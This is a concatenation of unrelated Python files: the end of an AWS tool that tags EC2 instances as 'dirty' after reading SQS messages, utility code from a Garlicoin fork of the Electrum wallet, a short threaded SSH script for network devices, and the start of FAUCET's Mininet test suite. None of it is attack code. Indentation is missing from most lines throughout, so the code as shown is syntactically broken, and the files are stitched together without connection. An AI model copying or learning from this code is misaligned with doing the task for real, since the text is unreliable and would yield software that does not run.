response = self.sqs_client.receive_message(QueueUrl=self.queue_url, AttributeNames=[
'All'], WaitTimeSeconds=5, MaxNumberOfMessages=10)
for message in response.get('Messages', []):
identity = json.loads(message['Body'])
skunk = {
"identity": dict(identity),
"dirty_timestamp": message['Attributes']['SentTimestamp'],
"receipt_handle": message['ReceiptHandle']
}
self.add_to_skunk(skunk)
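    # Illustrative message shape (values are made up): each SQS body is a JSON
    # "identity" document, e.g.
    #   {"instance_id": "i-0abc123", "instance_account_id": "123456789012",
    #    "instance_region": "us-west-2", "skunk_level": "high"}
    # which becomes skunk['identity'] alongside the SentTimestamp and receipt
    # handle captured above.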
def add_to_skunk(self, skunk):
account_id = skunk['identity']['instance_account_id']
instance_region = skunk['identity']['instance_region']
for filter in self.filter_plugins:
try:
if filter.apply(skunk['identity']):
                    # if a filter says "don't skunk", return without adding to the list
return
except Exception as e:
LOGGER.error('Exception Caught in Filter Plugin - {}: {}'.format(filter, e))
if self.to_be_skunked.get(account_id, '') == '':
self.to_be_skunked[account_id] = {}
self.to_be_skunked[account_id][instance_region] = []
self.to_be_skunked[account_id][instance_region].append(skunk)
elif self.to_be_skunked[account_id].get(instance_region, '') == '':
self.to_be_skunked[account_id][instance_region] = []
self.to_be_skunked[account_id][instance_region].append(skunk)
else:
self.to_be_skunked[account_id][instance_region].append(skunk)
def delete_identity_from_queue(self, receipt_handle_list):
delete_response = self.sqs_client.delete_message_batch(
QueueUrl=self.queue_url, Entries=receipt_handle_list)
def skunk_instances(self):
for account, regions in self.to_be_skunked.items():
for region, identities in self.to_be_skunked[account].items():
instance_resources = []
receipt_handles = []
count = 0
for skunk in self.to_be_skunked[account][region]:
# Add instance to DynamoDB table
if self.put(skunk):
count = count + 1
instance_resources.append(skunk['identity']['instance_id'])
receipt_handles.append({'Id': str(count), 'ReceiptHandle': skunk['receipt_handle']})
try:
for auditor in self.auditor_plugins:
proc = Process(target=auditor.audit, args=(skunk['identity'],))
proc.start()
except Exception as e:
LOGGER.error('Exception Caught in Auditor Plugin - {}: {}'.format(auditor, e))
if len(self.to_be_skunked[account][region]) > 0:
if self.config.get('tag', True):
self.tag(account, region, instance_resources)
if count > 0:
self.delete_identity_from_queue(receipt_handles)
self.to_be_skunked[account][region] = []
def tag(self, account, region, instances):
ec2_client = self.lk.connect_to_region(technology='ec2', account=account,
region=region, profile="Skunky", session_id="skunkystinks")
retry = [5, 5, 3, 3, 1, 1]
added = False
while len(retry) > 0 and not added:
try:
ec2_client.create_tags(
Resources=instances,
Tags=[
{
'Key': 'dirty',
'Value': 'skunked'
},
]
)
added = True
except ClientError:
                instance_string = ''
                for instance in instances:
                    instance_string = instance_string + instance + ","
                LOGGER.error("Failed to mark dirty the following instances in {}:{} - {}".format(account, region, instance_string))
                if len(retry) > 0:
                    retry_time = retry.pop()
                    LOGGER.debug("Sleeping {} and retrying".format(retry_time))
time.sleep(retry_time)
def put(self, skunk):
""" Will create a new entry only if one doesn't already exist """
item = {}
item['hash'] = self.hash(skunk)
item['instance_id'] = skunk['identity']['instance_id']
item['skunk_level'] = skunk['identity'].get('skunk_level', 'unknown')
item['account_id'] = skunk['identity']['instance_account_id']
item['region'] = skunk['identity']['instance_region']
item['marked_dirty'] = skunk['dirty_timestamp']
item['identity'] = json.dumps(skunk['identity'])
item['ttl'] = self.ttl()
retry = [5, 5, 3, 3, 1, 1]
added = False
while len(retry) > 0 and not added:
try:
self.dynamodb_table.put_item(Item=item, ExpressionAttributeNames={"#h": "hash"},
ConditionExpression="attribute_not_exists(#h)")
added = True
except ClientError as e:
if "ConditionalCheckFailedException" == e.response['Error']['Code']:
return False
if len(retry) > 0:
retry_time = retry.pop()
LOGGER.debug("Sleeping {} and retrying".format(retry_time))
time.sleep(retry_time)
except Exception:
raise
return True
def hash(self, skunk):
return '{}::{}::{}::{}'.format(skunk['identity']['instance_account_id'], skunk['identity']['instance_region'],
skunk['identity']['instance_id'], skunk['dirty_timestamp'])
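    # Example of the dedupe key produced above (illustrative values):
    #   '123456789012::us-west-2::i-0abc123::1600000000000'
    # i.e. one DynamoDB item per (account, region, instance, SentTimestamp).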
def ttl(self):
return int(time.time() + self.ttl_time)
def main():
try:
skunky = Skunky(session=Session, config='config.json')
skunky.run()
except KeyboardInterrupt:
logging.debug("Skunky exiting due to KeyboardInterrupt...")
|
util.py
|
# Electrum - lightweight Bitcoin client
# Copyright (C) 2011 Thomas Voegtlin
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import binascii
import os, sys, re, json, time  # "time" is used by DebugMem and profiler below
from collections import defaultdict
from datetime import datetime
import decimal
from decimal import Decimal
import traceback
import urllib
import threading
import hmac
import stat
from .i18n import _
import urllib.request, urllib.parse, urllib.error
import queue
def inv_dict(d):
return {v: k for k, v in d.items()}
base_units = {'GRLC':8, 'mGRLC':5, 'uGRLC':2, 'clove':0}
base_units_inverse = inv_dict(base_units)
base_units_list = ['GRLC', 'mGRLC', 'uGRLC', 'clove'] # list(dict) does not guarantee order
def decimal_point_to_base_unit_name(dp: int) -> str:
# e.g. 8 -> "BTC"
try:
return base_units_inverse[dp]
except KeyError:
raise Exception('Unknown base unit')
def base_unit_name_to_decimal_point(unit_name: str) -> int:
# e.g. "BTC" -> 8
try:
return base_units[unit_name]
except KeyError:
raise Exception('Unknown base unit')
def normalize_version(v):
return [int(x) for x in re.sub(r'(\.0+)*$','', v).split(".")]
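# e.g. normalize_version('3.2.0') == [3, 2] and normalize_version('3.2.1') == [3, 2, 1],
# so version lists compare as expected even with trailing ".0" components.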
class NotEnoughFunds(Exception): pass
class NoDynamicFeeEstimates(Exception):
def __str__(self):
return _('Dynamic fee estimates not available')
class InvalidPassword(Exception):
def __str__(self):
return _("Incorrect password")
class FileImportFailed(Exception):
def __init__(self, message=''):
self.message = str(message)
def __str__(self):
return _("Failed to import from file.") + "\n" + self.message
class FileExportFailed(Exception):
def __init__(self, message=''):
self.message = str(message)
def __str__(self):
return _("Failed to export to file.") + "\n" + self.message
class TimeoutException(Exception):
def __init__(self, message=''):
self.message = str(message)
def __str__(self):
if not self.message:
return _("Operation timed out.")
return self.message
class WalletFileException(Exception): pass
class BitcoinException(Exception): pass
# Throw this exception to unwind the stack like when an error occurs.
# However unlike other exceptions the user won't be informed.
class UserCancelled(Exception):
'''An exception that is suppressed from the user'''
pass
class Satoshis(object):
def __new__(cls, value):
self = super(Satoshis, cls).__new__(cls)
self.value = value
return self
def __repr__(self):
return 'Satoshis(%d)'%self.value
def __str__(self):
return format_satoshis(self.value) + " LTC"
class Fiat(object):
def __new__(cls, value, ccy):
self = super(Fiat, cls).__new__(cls)
self.ccy = ccy
self.value = value
return self
def __repr__(self):
return 'Fiat(%s)'% self.__str__()
def __str__(self):
if self.value.is_nan():
return _('No Data')
else:
return "{:.2f}".format(self.value) + ' ' + self.ccy
class MyEncoder(json.JSONEncoder):
def default(self, obj):
from .transaction import Transaction
if isinstance(obj, Transaction):
return obj.as_dict()
if isinstance(obj, Satoshis):
return str(obj)
if isinstance(obj, Fiat):
return str(obj)
if isinstance(obj, Decimal):
return str(obj)
if isinstance(obj, datetime):
return obj.isoformat(' ')[:-3]
if isinstance(obj, set):
return list(obj)
return super(MyEncoder, self).default(obj)
class PrintError(object):
'''A handy base class'''
def diagnostic_name(self):
return self.__class__.__name__
def print_error(self, *msg):
# only prints with --verbose flag
print_error("[%s]" % self.diagnostic_name(), *msg)
def print_stderr(self, *msg):
print_stderr("[%s]" % self.diagnostic_name(), *msg)
def print_msg(self, *msg):
print_msg("[%s]" % self.diagnostic_name(), *msg)
class ThreadJob(PrintError):
"""A job that is run periodically from a thread's main loop. run() is
called from that thread's context.
"""
def run(self):
"""Called periodically from the thread"""
pass
class DebugMem(ThreadJob):
'''A handy class for debugging GC memory leaks'''
def __init__(self, classes, interval=30):
self.next_time = 0
self.classes = classes
self.interval = interval
def mem_stats(self):
import gc
self.print_error("Start memscan")
gc.collect()
objmap = defaultdict(list)
for obj in gc.get_objects():
for class_ in self.classes:
if isinstance(obj, class_):
objmap[class_].append(obj)
for class_, objs in objmap.items():
self.print_error("%s: %d" % (class_.__name__, len(objs)))
self.print_error("Finish memscan")
def run(self):
if time.time() > self.next_time:
self.mem_stats()
self.next_time = time.time() + self.interval
class DaemonThread(threading.Thread, PrintError):
""" daemon thread that terminates cleanly """
def __init__(self):
threading.Thread.__init__(self)
self.parent_thread = threading.currentThread()
self.running = False
self.running_lock = threading.Lock()
self.job_lock = threading.Lock()
self.jobs = []
def add_jobs(self, jobs):
with self.job_lock:
self.jobs.extend(jobs)
def run_jobs(self):
# Don't let a throwing job disrupt the thread, future runs of
# itself, or other jobs. This is useful protection against
# malformed or malicious server responses
with self.job_lock:
for job in self.jobs:
try:
job.run()
except Exception as e:
traceback.print_exc(file=sys.stderr)
def remove_jobs(self, jobs):
with self.job_lock:
for job in jobs:
self.jobs.remove(job)
def start(self):
with self.running_lock:
self.running = True
return threading.Thread.start(self)
def is_running(self):
with self.running_lock:
return self.running and self.parent_thread.is_alive()
def stop(self):
with self.running_lock:
self.running = False
def on_stop(self):
if 'ANDROID_DATA' in os.environ:
import jnius
jnius.detach()
self.print_error("jnius detach")
self.print_error("stopped")
# TODO: disable
is_verbose = True
def set_verbosity(b):
global is_verbose
#is_verbose = b
def print_error(*args):
if not is_verbose: return
print_stderr(*args)
def print_stderr(*args):
args = [str(item) for item in args]
sys.stderr.write(" ".join(args) + "\n")
sys.stderr.flush()
def print_msg(*args):
# Stringify args
args = [str(item) for item in args]
sys.stdout.write(" ".join(args) + "\n")
sys.stdout.flush()
def json_encode(obj):
try:
s = json.dumps(obj, sort_keys = True, indent = 4, cls=MyEncoder)
except TypeError:
s = repr(obj)
return s
def json_decode(x):
try:
return json.loads(x, parse_float=Decimal)
except:
return x
# taken from Django Source Code
def constant_time_compare(val1, val2):
"""Return True if the two strings are equal, False otherwise."""
return hmac.compare_digest(to_bytes(val1, 'utf8'), to_bytes(val2, 'utf8'))
# decorator that prints execution time
def profiler(func):
def do_profile(func, args, kw_args):
n = func.__name__
t0 = time.time()
o = func(*args, **kw_args)
t = time.time() - t0
print_error("[profiler]", n, "%.4f"%t)
return o
return lambda *args, **kw_args: do_profile(func, args, kw_args)
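# Usage sketch (illustrative): decorate any function to log its runtime when
# running with --verbose, e.g.
#
#     @profiler
#     def load_wallet(path):
#         ...
#
# which prints a line like "[profiler] load_wallet 0.1234" via print_error().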
def android_ext_dir():
import jnius
env = jnius.autoclass('android.os.Environment')
return env.getExternalStorageDirectory().getPath()
def android_data_dir():
import jnius
PythonActivity = jnius.autoclass('org.kivy.android.PythonActivity')
return PythonActivity.mActivity.getFilesDir().getPath() + '/data'
def android_headers_dir():
d = android_ext_dir() + '/org.garlium_ltc.garlium_ltc'
if not os.path.exists(d):
try:
os.mkdir(d)
except FileExistsError:
pass # in case of race
return d
def android_check_data_dir():
""" if needed, move old directory to sandbox """
ext_dir = android_ext_dir()
data_dir = android_data_dir()
old_electrum_dir = ext_dir + '/garlium'
if not os.path.exists(data_dir) and os.path.exists(old_electrum_dir):
import shutil
new_headers_path = android_headers_dir() + '/blockchain_headers'
old_headers_path = old_electrum_dir + '/blockchain_headers'
if not os.path.exists(new_headers_path) and os.path.exists(old_headers_path):
print_error("Moving headers file to", new_headers_path)
shutil.move(old_headers_path, new_headers_path)
print_error("Moving data to", data_dir)
shutil.move(old_electrum_dir, data_dir)
return data_dir
def get_headers_dir(config):
return android_headers_dir() if 'ANDROID_DATA' in os.environ else config.path
def assert_datadir_available(config_path):
path = config_path
if os.path.exists(path):
return
else:
raise FileNotFoundError(
'Electrum datadir does not exist. Was it deleted while running?' + '\n' +
'Should be at {}'.format(path))
def assert_file_in_datadir_available(path, config_path):
if os.path.exists(path):
return
else:
assert_datadir_available(config_path)
raise FileNotFoundError(
'Cannot find file but datadir is there.' + '\n' +
'Should be at {}'.format(path))
def assert_bytes(*args):
"""
porting helper, assert args type
"""
try:
for x in args:
assert isinstance(x, (bytes, bytearray))
except:
print('assert bytes failed', list(map(type, args)))
raise
def assert_str(*args):
"""
porting helper, assert args type
"""
for x in args:
assert isinstance(x, str)
def to_string(x, enc):
if isinstance(x, (bytes, bytearray)):
return x.decode(enc)
if isinstance(x, str):
return x
else:
raise TypeError("Not a string or bytes like object")
def to_bytes(something, encoding='utf8'):
"""
cast string to bytes() like object, but for python2 support it's bytearray copy
"""
if isinstance(something, bytes):
return something
if isinstance(something, str):
return something.encode(encoding)
elif isinstance(something, bytearray):
return bytes(something)
else:
raise TypeError("Not a string or bytes like object")
bfh = bytes.fromhex
hfu = binascii.hexlify
def bh2u(x):
"""
str with hex representation of a bytes-like object
>>> x = bytes((1, 2, 10))
>>> bh2u(x)
    '01020a'
:param x: bytes
:rtype: str
"""
return hfu(x).decode('ascii')
def user_dir():
if 'ANDROID_DATA' in os.environ:
return android_check_data_dir()
elif os.name == 'posix':
return os.path.join(os.environ["HOME"], ".garlium")
elif "APPDATA" in os.environ:
return os.path.join(os.environ["APPDATA"], "Garlium")
elif "LOCALAPPDATA" in os.environ:
return os.path.join(os.environ["LOCALAPPDATA"], "Garlium")
else:
#raise Exception("No home directory found in environment variables.")
return
def is_valid_email(s):
regexp = r"[^@]+@[^@]+\.[^@]+"
return re.match(regexp, s) is not None
def format_satoshis_plain(x, decimal_point = 8):
"""Display a satoshi amount scaled. Always uses a '.' as a decimal
point and has no thousands separator"""
scale_factor = pow(10, decimal_point)
return "{:.8f}".format(Decimal(x) / scale_factor).rstrip('0').rstrip('.')
def format_satoshis(x, num_zeros=0, decimal_point=8, precision=None, is_diff=False, whitespaces=False):
from locale import localeconv
if x is None:
return 'unknown'
if precision is None:
precision = decimal_point
decimal_format = ".0" + str(precision) if precision > 0 else ""
if is_diff:
decimal_format = '+' + decimal_format
result = ("{:" + decimal_format + "f}").format(x / pow (10, decimal_point)).rstrip('0')
integer_part, fract_part = result.split(".")
dp = localeconv()['decimal_point']
if len(fract_part) < num_zeros:
fract_part += "0" * (num_zeros - len(fract_part))
result = integer_part + dp + fract_part
if whitespaces:
result += " " * (decimal_point - len(fract_part))
result = " " * (15 - len(result)) + result
return result
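# Example outputs (sketch; assumes a locale whose decimal point is '.'):
#   format_satoshis(1234500)                -> '0.012345'
#   format_satoshis(1234500, is_diff=True)  -> '+0.012345'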
FEERATE_PRECISION = 1 # num fractional decimal places for sat/byte fee rates
_feerate_quanta = Decimal(10) ** (-FEERATE_PRECISION)
def format_fee_satoshis(fee, num_zeros=0):
return format_satoshis(fee, num_zeros, 0, precision=FEERATE_PRECISION)
def quantize_feerate(fee):
"""Strip sat/byte fee rate of excess precision."""
if fee is None:
return None
return Decimal(fee).quantize(_feerate_quanta, rounding=decimal.ROUND_HALF_DOWN)
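# Example (sketch): with FEERATE_PRECISION == 1 the quantum is 0.1 sat/byte and
# ties round towards zero (ROUND_HALF_DOWN):
#   quantize_feerate(1.25)  -> Decimal('1.2')
#   quantize_feerate(2)     -> Decimal('2.0')
#   quantize_feerate(None)  -> None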
def timestamp_to_datetime(timestamp):
if timestamp is None:
return None
return datetime.fromtimestamp(timestamp)
def format_time(timestamp):
date = timestamp_to_datetime(timestamp)
return date.isoformat(' ')[:-3] if date else _("Unknown")
# Takes a timestamp and returns a string with the approximation of the age
def age(from_date, since_date = None, target_tz=None, include_seconds=False):
if from_date is None:
return "Unknown"
from_date = datetime.fromtimestamp(from_date)
if since_date is None:
since_date = datetime.now(target_tz)
td = time_difference(from_date - since_date, include_seconds)
return td + " ago" if from_date < since_date else "in " + td
def time_difference(distance_in_time, include_seconds):
#distance_in_time = since_date - from_date
distance_in_seconds = int(round(abs(distance_in_time.days * 86400 + distance_in_time.seconds)))
distance_in_minutes = int(round(distance_in_seconds/60))
if distance_in_minutes <= 1:
if include_seconds:
for remainder in [5, 10, 20]:
if distance_in_seconds < remainder:
return "less than %s seconds" % remainder
if distance_in_seconds < 40:
return "half a minute"
elif distance_in_seconds < 60:
return "less than a minute"
else:
return "1 minute"
else:
if distance_in_minutes == 0:
return "less than a minute"
else:
return "1 minute"
elif distance_in_minutes < 45:
return "%s minutes" % distance_in_minutes
elif distance_in_minutes < 90:
return "about 1 hour"
elif distance_in_minutes < 1440:
return "about %d hours" % (round(distance_in_minutes / 60.0))
elif distance_in_minutes < 2880:
return "1 day"
elif distance_in_minutes < 43220:
return "%d days" % (round(distance_in_minutes / 1440))
elif distance_in_minutes < 86400:
return "about 1 month"
elif distance_in_minutes < 525600:
return "%d months" % (round(distance_in_minutes / 43200))
elif distance_in_minutes < 1051200:
return "about 1 year"
else:
return "over %d years" % (round(distance_in_minutes / 525600))
mainnet_block_explorers = {
'Insight': ('https://insight.garli.co.in/',
                {'tx': 'tx/', 'addr': 'address/'}),
'system default': ('blockchain:',
{'tx': 'tx', 'addr': 'address'}),
}
testnet_block_explorers = {
'system default': ('blockchain:',
{'tx': 'tx', 'addr': 'address'}),
}
def block_explorer_info():
from . import constants
return testnet_block_explorers if constants.net.TESTNET else mainnet_block_explorers
def block_explorer(config):
    return config.get('block_explorer', 'Insight')
def block_explorer_tuple(config):
return block_explorer_info().get(block_explorer(config))
def block_explorer_URL(config, kind, item):
be_tuple = block_explorer_tuple(config)
if not be_tuple:
return
kind_str = be_tuple[1].get(kind)
if not kind_str:
return
url_parts = [be_tuple[0], kind_str, item]
return ''.join(url_parts)
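# Example (sketch): with the 'Insight' explorer selected, the URL parts are
# simply concatenated, e.g. for kind 'tx' and a hypothetical <txid>:
#   'https://insight.garli.co.in/' + 'tx/' + '<txid>'
#   -> 'https://insight.garli.co.in/tx/<txid>'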
# URL decode
#_ud = re.compile('%([0-9a-hA-H]{2})', re.MULTILINE)
#urldecode = lambda x: _ud.sub(lambda m: chr(int(m.group(1), 16)), x)
def parse_URI(uri, on_pr=None):
from . import bitcoin
from .bitcoin import COIN
if ':' not in uri:
if not bitcoin.is_address(uri):
raise Exception("Not a Garlicoin address")
return {'address': uri}
u = urllib.parse.urlparse(uri)
if u.scheme != 'garlicoin':
raise Exception("Not a Garlicoin URI")
address = u.path
# python for android fails to parse query
if address.find('?') > 0:
address, query = u.path.split('?')
pq = urllib.parse.parse_qs(query)
else:
pq = urllib.parse.parse_qs(u.query)
for k, v in pq.items():
if len(v)!=1:
raise Exception('Duplicate Key', k)
out = {k: v[0] for k, v in pq.items()}
if address:
if not bitcoin.is_address(address):
raise Exception("Invalid Garlicoin address:" + address)
out['address'] = address
if 'amount' in out:
am = out['amount']
        m = re.match(r'([0-9\.]+)X([0-9])', am)
if m:
k = int(m.group(2)) - 8
amount = Decimal(m.group(1)) * pow( Decimal(10) , k)
else:
amount = Decimal(am) * COIN
out['amount'] = int(amount)
if 'message' in out:
out['message'] = out['message']
out['memo'] = out['message']
if 'time' in out:
out['time'] = int(out['time'])
if 'exp' in out:
out['exp'] = int(out['exp'])
if 'sig' in out:
out['sig'] = bh2u(bitcoin.base_decode(out['sig'], None, base=58))
r = out.get('r')
sig = out.get('sig')
name = out.get('name')
if on_pr and (r or (name and sig)):
def get_payment_request_thread():
from . import paymentrequest as pr
if name and sig:
s = pr.serialize_request(out).SerializeToString()
request = pr.PaymentRequest(s)
else:
request = pr.get_payment_request(r)
if on_pr:
on_pr(request)
t = threading.Thread(target=get_payment_request_thread)
        t.daemon = True
t.start()
return out
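# Illustrative result shape (sketch; the address placeholder must be a real
# Garlicoin address that passes bitcoin.is_address()):
#   parse_URI('garlicoin:<address>?amount=1.5&message=donation')
#   -> {'address': '<address>', 'amount': 150000000,
#       'message': 'donation', 'memo': 'donation'}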
def create_URI(addr, amount, message):
from . import bitcoin
if not bitcoin.is_address(addr):
return ""
query = []
if amount:
query.append('amount=%s'%format_satoshis_plain(amount))
if message:
query.append('message=%s'%urllib.parse.quote(message))
p = urllib.parse.ParseResult(scheme='garlicoin', netloc='', path=addr, params='', query='&'.join(query), fragment='')
return urllib.parse.urlunparse(p)
# Python bug (http://bugs.python.org/issue1927) causes raw_input
# to be redirected improperly between stdin/stderr on Unix systems
#TODO: py3
def raw_input(prompt=None):
if prompt:
sys.stdout.write(prompt)
return builtin_raw_input()
import builtins
builtin_raw_input = builtins.input
builtins.input = raw_input
def parse_json(message):
# TODO: check \r\n pattern
n = message.find(b'\n')
if n==-1:
return None, message
try:
j = json.loads(message[0:n].decode('utf8'))
except:
j = None
return j, message[n+1:]
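# parse_json() splits one newline-terminated JSON object off a byte buffer
# (sketch):
#   parse_json(b'{"id": 1}\nrest')  -> ({'id': 1}, b'rest')
#   parse_json(b'partial')          -> (None, b'partial')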
class timeout(Exception):
pass
import socket
import json
import ssl
import time
class SocketPipe:
def __init__(self, socket):
self.socket = socket
self.message = b''
self.set_timeout(0.1)
self.recv_time = time.time()
def set_timeout(self, t):
self.socket.settimeout(t)
def idle_time(self):
return time.time() - self.recv_time
def get(self):
while True:
response, self.message = parse_json(self.message)
if response is not None:
return response
try:
data = self.socket.recv(1024)
except socket.timeout:
raise timeout
except ssl.SSLError:
raise timeout
except socket.error as err:
if err.errno == 60:
raise timeout
elif err.errno in [11, 35, 10035]:
print_error("socket errno %d (resource temporarily unavailable)"% err.errno)
time.sleep(0.2)
raise timeout
else:
print_error("pipe: socket error", err)
data = b''
except:
traceback.print_exc(file=sys.stderr)
data = b''
if not data: # Connection closed remotely
return None
self.message += data
self.recv_time = time.time()
def send(self, request):
out = json.dumps(request) + '\n'
out = out.encode('utf8')
self._send(out)
def send_all(self, requests):
out = b''.join(map(lambda x: (json.dumps(x) + '\n').encode('utf8'), requests))
self._send(out)
def _send(self, out):
while out:
try:
sent = self.socket.send(out)
out = out[sent:]
except ssl.SSLError as e:
print_error("SSLError:", e)
time.sleep(0.1)
continue
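# Minimal usage sketch (assumes `sock` is an already-connected TCP/SSL socket
# speaking newline-delimited JSON, e.g. an Electrum-style server):
#   pipe = SocketPipe(sock)
#   pipe.send({'id': 0, 'method': 'server.version'})
#   response = pipe.get()  # raises the module-level `timeout` if the read times out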
class QueuePipe:
def __init__(self, send_queue=None, get_queue=None):
self.send_queue = send_queue if send_queue else queue.Queue()
self.get_queue = get_queue if get_queue else queue.Queue()
self.set_timeout(0.1)
def get(self):
try:
return self.get_queue.get(timeout=self.timeout)
except queue.Empty:
raise timeout
def get_all(self):
responses = []
while True:
try:
r = self.get_queue.get_nowait()
responses.append(r)
except queue.Empty:
break
return responses
def set_timeout(self, t):
self.timeout = t
def send(self, request):
self.send_queue.put(request)
def send_all(self, requests):
for request in requests:
self.send(request)
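# Minimal usage sketch: two QueuePipes can be cross-wired for in-process tests,
# so whatever one side send()s the other side get()s:
#   a_to_b, b_to_a = queue.Queue(), queue.Queue()
#   client = QueuePipe(send_queue=a_to_b, get_queue=b_to_a)
#   server = QueuePipe(send_queue=b_to_a, get_queue=a_to_b)
#   client.send({'method': 'ping'}); server.get()  -> {'method': 'ping'}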
def setup_thread_excepthook():
"""
Workaround for `sys.excepthook` thread bug from:
http://bugs.python.org/issue1230540
Call once from the main thread before creating any threads.
"""
init_original = threading.Thread.__init__
def init(self, *args, **kwargs):
init_original(self, *args, **kwargs)
run_original = self.run
def run_with_except_hook(*args2, **kwargs2):
try:
run_original(*args2, **kwargs2)
except Exception:
sys.excepthook(*sys.exc_info())
self.run = run_with_except_hook
threading.Thread.__init__ = init
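# Usage sketch: install the hook once from the main thread before any worker
# threads are created, so their uncaught exceptions reach sys.excepthook
# (`worker` below is a hypothetical callable):
#   setup_thread_excepthook()
#   threading.Thread(target=worker).start()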
def versiontuple(v):
return tuple(map(int, (v.split("."))))
def import_meta(path, validater, load_meta):
try:
with open(path, 'r', encoding='utf-8') as f:
d = validater(json.loads(f.read()))
load_meta(d)
#backwards compatibility for JSONDecodeError
except ValueError:
traceback.print_exc(file=sys.stderr)
raise FileImportFailed(_("Invalid JSON code."))
except BaseException as e:
traceback.print_exc(file=sys.stdout)
raise FileImportFailed(e)
def export_meta(meta, fileName):
try:
with open(fileName, 'w+', encoding='utf-8') as f:
json.dump(meta, f, indent=4, sort_keys=True)
except (IOError, os.error) as e:
traceback.print_exc(file=sys.stderr)
raise FileExportFailed(e)
def make_dir(path, allow_symlink=True):
"""Make directory if it does not yet exist."""
if not os.path.exists(path):
if not allow_symlink and os.path.islink(path):
raise Exception('Dangling link: ' + path)
os.mkdir(path)
os.chmod(path, stat.S_IRUSR | stat.S_IWUSR | stat.S_IXUSR)
|
exercise2.py
|
from my_functions import ssh_command
from my_devices import devices_list
from datetime import datetime
import threading
start_time = datetime.now()
for device in devices_list:
thread = threading.Thread(target=ssh_command, args=(device, "show version"))
thread.start()
main_thread = threading.current_thread()
for thread in threading.enumerate():
if thread != main_thread:
thread.join()
print("\nElapsed time: " + str(datetime.now() - start_time))
|
mininet_tests.py
|
#!/usr/bin/env python3
"""Mininet tests for FAUCET."""
# pylint: disable=too-many-lines
# pylint: disable=missing-docstring
# pylint: disable=too-many-arguments
# pylint: disable=unbalanced-tuple-unpacking
import binascii
import collections
import copy
import itertools
import ipaddress
import json
import os
import random
import re
import shutil
import socket
import threading
import time
import unittest
from http.server import SimpleHTTPRequestHandler
from http.server import HTTPServer
import scapy.all
import yaml # pytype: disable=pyi-error
from mininet.log import error
from mininet.util import pmonitor
from clib import mininet_test_base
from clib import mininet_test_util
from clib import mininet_test_topo
from clib.mininet_test_base import PEER_BGP_AS, IPV4_ETH, IPV6_ETH
MIN_MBPS = 100
CONFIG_BOILER_UNTAGGED = """
interfaces:
%(port_1)d:
native_vlan: 100
%(port_2)d:
native_vlan: 100
%(port_3)d:
native_vlan: 100
%(port_4)d:
native_vlan: 100
"""
CONFIG_TAGGED_BOILER = """
interfaces:
%(port_1)d:
tagged_vlans: [100]
count_untag_vlan_miss: true
%(port_2)d:
tagged_vlans: [100]
count_untag_vlan_miss: true
%(port_3)d:
tagged_vlans: [100]
count_untag_vlan_miss: true
%(port_4)d:
tagged_vlans: [100]
count_untag_vlan_miss: true
"""
class QuietHTTPServer(HTTPServer):
allow_reuse_address = True
timeout = None
@staticmethod
def handle_error(_request, _client_address):
return
class PostHandler(SimpleHTTPRequestHandler):
@staticmethod
def log_message(_format, *_args):
return
def _log_post(self):
content_len = int(self.headers.get('content-length', 0))
content = self.rfile.read(content_len).decode().strip()
if content and hasattr(self.server, 'influx_log'):
with open(self.server.influx_log, 'a') as influx_log:
influx_log.write(content + '\n')
class InfluxPostHandler(PostHandler):
def do_POST(self): # pylint: disable=invalid-name
self._log_post()
return self.send_response(204)
class SlowInfluxPostHandler(PostHandler):
def do_POST(self): # pylint: disable=invalid-name
self._log_post()
time.sleep(self.server.timeout * 3)
return self.send_response(500)
class FaucetTest(mininet_test_base.FaucetTestBase):
pass
class FaucetUntaggedTest(FaucetTest):
"""Basic untagged VLAN test."""
HOST_NAMESPACE = {}
N_UNTAGGED = 4
N_TAGGED = 0
LINKS_PER_HOST = 1
EVENT_SOCK_HEARTBEAT = '5'
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
"""
# pylint: disable=invalid-name
CONFIG = CONFIG_BOILER_UNTAGGED
def setUp(self): # pylint: disable=invalid-name
super(FaucetUntaggedTest, self).setUp()
self.topo = self.topo_class(
self.OVS_TYPE, self.ports_sock, self._test_name(), [self.dpid],
n_tagged=self.N_TAGGED, n_untagged=self.N_UNTAGGED,
links_per_host=self.LINKS_PER_HOST, hw_dpid=self.hw_dpid,
host_namespace=self.HOST_NAMESPACE)
self.start_net()
def verify_events_log(self, event_log, timeout=10):
required_events = {'CONFIG_CHANGE', 'PORT_CHANGE', 'L2_LEARN', 'PORTS_STATUS', 'EVENT_SOCK_HEARTBEAT'}
for _ in range(timeout):
prom_event_id = self.scrape_prometheus_var('faucet_event_id', dpid=False)
event_id = None
with open(event_log, 'r') as event_log_file:
for event_log_line in event_log_file.readlines():
event = json.loads(event_log_line.strip())
event_id = event['event_id']
required_events -= set(event.keys())
if prom_event_id == event_id:
return
time.sleep(1)
self.assertEqual(prom_event_id, event_id)
self.assertFalse(required_events)
def test_untagged(self):
"""All hosts on the same untagged VLAN should have connectivity."""
self._enable_event_log()
self.ping_all_when_learned()
self.flap_all_switch_ports()
self.verify_traveling_dhcp_mac()
self.gauge_smoke_test()
self.prometheus_smoke_test()
self.assertGreater(os.path.getsize(self.event_log), 0)
self.verify_events_log(self.event_log)
class Faucet8021XBaseTest(FaucetTest):
HOST_NAMESPACE = {3: False}
N_UNTAGGED = 4
N_TAGGED = 0
LINKS_PER_HOST = 1
RADIUS_PORT = None
DOT1X_EXPECTED_EVENTS = []
SESSION_TIMEOUT = 3600
LOG_LEVEL = 'DEBUG'
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
"""
CONFIG = """
dot1x:
nfv_intf: NFV_INTF
nfv_sw_port: %(port_4)d
radius_ip: 127.0.0.1
radius_port: RADIUS_PORT
radius_secret: SECRET
